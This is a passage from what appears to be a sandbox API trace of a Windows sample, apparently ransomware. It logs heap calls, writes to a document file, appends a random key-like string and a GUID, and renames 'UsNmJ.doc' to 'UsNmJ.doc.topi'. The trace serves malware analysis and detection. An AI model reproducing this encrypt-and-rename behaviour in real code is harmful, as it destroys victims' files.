hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.151] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x13938, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x13938, lpOverlapped=0x0) returned 1 [0097.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.152] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1393d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.152] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.152] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.152] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.152] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.153] CloseHandle (hObject=0x6a8) returned 1 [0097.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317edb0 [0097.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317edb0 | out: hHeap=0x680000) returned 1 [0097.157] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\UsNmJ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\usnmj.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\UsNmJ.doc.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\usnmj.doc.topi")) returned 1 [0097.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.158] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.159] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.159] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68fdd0, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xe9714ec0, ftLastAccessTime.dwHighDateTime=0x1d5bd2e, ftLastWriteTime.dwLowDateTime=0xe9714ec0, ftLastWriteTime.dwHighDateTime=0x1d5bd2e, nFileSizeHigh=0x0, nFileSizeLow=0x1393d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsNmJ.doc", cAlternateFileName="")) returned 0 [0097.159] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0097.160] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.160] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.161] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] 